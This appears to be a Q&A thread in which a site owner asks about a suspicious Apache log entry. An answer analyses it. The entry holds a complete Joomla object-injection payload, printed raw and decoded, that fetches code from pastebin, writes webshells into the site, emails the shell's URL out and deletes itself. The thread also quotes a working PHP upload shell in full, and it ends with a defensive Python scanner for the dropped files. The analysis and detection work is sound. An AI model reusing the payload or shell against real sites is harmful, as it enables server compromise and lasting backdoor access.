MySQL Injection Attempt - How to replicate from access.log?

I have recently been working on preventing SQL injection in my production Apache/PHP/MySQL web application.

To that end, I regularly go through the Apache access logs looking for unusual requests and, when I find one, occasionally try to replicate it (does anyone have a better recommendation?).

Today I noticed a strange entry in the access log. I can see that an HTTP referrer is present, but I have no matching log entry for the original request. There is also no matching entry in the Apache error log saying it was "denied by server configuration".

Here is the odd log entry (base64 decoded):

169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('

<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);


$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);


?>

')); fclose($fp); JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\0\0\0connection\";b:1;}\xf0\xfd\xfd\xfd"

I tried to replicate this GET request via Postman, but it was treated as "an invalid XMLHTTPRequest". I am not sure how one would normally test this?

I am also not sure what this does (or tries to do). Any information/theories on what this attempt does (and whether it could have succeeded) would be much appreciated.

My guess is that this is just a simple attempt to inject SQL into some "framework" via the HTTP referrer, but I am not an expert. Thanks in advance for your help.

Here is what I got from decoding it:

<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

It looks like you are using the Joomla CMS. There is a file, lol.php, in the libraries folder that is being called by the script. Another file, /libraries/joomla/wl.php, is also a malicious file that gets called. The pastebin code is also being executed:

<?php 
// name of the file is: i (it has no extension)
error_reporting(0);

if(isset($_GET["0"]))
    {
        echo "<font color=#000FFF>[uname]".php_uname()."[/uname]"; echo "<br>"; print "\n";
        if(@ini_get("disable_functions")){ echo "DisablePHP=".@ini_get("disable_functions"); } else { echo "Disable PHP = NONE"; }
        echo "<br>"; print "\n";
        if(@ini_get("safe_mode")){ echo "Safe Mode = ON"; } else { echo "Safe Mode = OFF"; }
        echo "<br>"; print "\n";
        // upload form: the posted file is copied into the current directory under its original name
        echo "<form method=post enctype=multipart/form-data>";
        echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
        if($_POST["v"]==up){
            if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
                echo "<b>berhasil</b>-->".$_FILES["f"]["name"];   // "berhasil": success (Indonesian)
            }else{
                echo "<b>gagal";                                   // "gagal": failed
            }
        }
    }
echo 'walex';

echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";

?>

It is writing the pastebin code into your file /libraries/joomla/jmail.php.

Conclusion:

If you are not using the Joomla CMS, there is nothing to worry about. If you are, then you need to check those affected files. Malicious files may have been uploaded to your server.
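Following the answer's advice to check the affected files: the script below, an added example rather than code from the answer, reports which of the dropper's target paths exist under a Joomla document root and greps every .php file under it for the primitives the pasted upload shell relies on ($_FILES plus copy(), base64_decode, eval/assert, the disable_functions probe). The drop paths are the ones named in the decoded payload above; the suspicious-token list and the sample webroot created by build_sample_webroot() are constructed for this example. Pass a real document root on the command line to run it against a site.

```python
"""Triage a Joomla document root for the files the decoded dropper writes, plus any other
PHP file carrying upload or code-execution primitives.

Added example (not from the original post or answer). The drop paths come from the decoded
payload; the token list and the sample webroot built by build_sample_webroot() are constructed.
"""
import os
import re
import tempfile

# Paths the decoded dropper and its second stage write, relative to DOCUMENT_ROOT
DROPPED_PATHS = [
    'libraries/lol.php',
    'libraries/joomla/wl.php',
    'libraries/joomla/jmail.php',
    's.htm',
    'libraries/joomla/check.php',
    'libraries/joomla/jmails.php',
]

# Primitives the pasted webshell uses (file upload via $_FILES + copy()) and the usual
# code-execution sinks a dropper uses. Presence alone is not proof; hits need a manual look.
SUSPICIOUS_TOKENS = {
    '$_FILES': re.compile(r'\$_FILES\b'),
    'copy(': re.compile(r'\bcopy\s*\('),
    'base64_decode(': re.compile(r'\bbase64_decode\s*\('),
    'eval(': re.compile(r'\beval\s*\('),
    'assert(': re.compile(r'\bassert\s*\('),
    'disable_functions probe': re.compile(r'ini_get\s*\(\s*["\']disable_functions'),
}


def check_dropped_files(webroot: str) -> list:
    """Return the dropper's target paths that exist under webroot, in DROPPED_PATHS order."""
    return [p for p in DROPPED_PATHS if os.path.isfile(os.path.join(webroot, p))]


def scan_php_files(webroot: str) -> dict:
    """Map each .php file under webroot to the suspicious tokens it contains (clean files omitted)."""
    hits = {}
    for dirpath, _, filenames in os.walk(webroot):
        for fn in filenames:
            if not fn.lower().endswith('.php'):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, 'r', encoding='utf-8', errors='replace') as fh:
                src = fh.read()
            found = [name for name, rx in SUSPICIOUS_TOKENS.items() if rx.search(src)]
            if found:
                hits[os.path.relpath(path, webroot).replace(os.sep, '/')] = found
    return hits


def triage(webroot: str) -> dict:
    """Combine both checks into one report."""
    return {'dropped': check_dropped_files(webroot), 'suspicious': scan_php_files(webroot)}


def build_sample_webroot() -> str:
    """Create a throwaway directory mimicking a compromised Joomla root (constructed sample)."""
    root = tempfile.mkdtemp(prefix='joomla-triage-')
    os.makedirs(os.path.join(root, 'libraries', 'joomla'))
    # benign library file with nothing of interest in it
    with open(os.path.join(root, 'libraries', 'joomla', 'factory.php'), 'w') as fh:
        fh.write("<?php\nclass JFactory { public static function getConfig() { return array(); } }\n")
    # planted upload shell using the same primitives as the pastebin script in the answer
    with open(os.path.join(root, 'libraries', 'joomla', 'jmail.php'), 'w') as fh:
        fh.write('<?php error_reporting(0);\n'
                 'if(isset($_GET["0"])){ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo "ok";} }\n')
    # the static page the dropper also writes
    with open(os.path.join(root, 's.htm'), 'w') as fh:
        fh.write('<html><body>defaced</body></html>\n')
    return root


if __name__ == '__main__':
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_webroot()
    report = triage(root)
    print('dropper targets present:', report['dropped'] or 'none')
    for path, tokens in report['suspicious'].items():
        print(f'{path}: {", ".join(tokens)}')
```

A hit from scan_php_files is a lead, not a verdict: some legitimate extensions call copy() on uploaded files. Compare flagged files against a clean Joomla release of the same version and check their modification times against the timestamp of the log entry.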